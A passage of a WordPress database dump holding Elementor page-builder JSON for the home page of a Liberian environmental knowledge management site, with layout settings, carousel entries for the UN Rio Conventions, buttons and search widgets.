fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(12483,2040,'_elementor_version','2.7.5'),(12484,2040,'_elementor_template_type','wp-page'),(12485,2040,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(12496,2043,'_wp_page_template','default'),(12497,2043,'_elementor_edit_mode','builder'),(12498,2043,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental 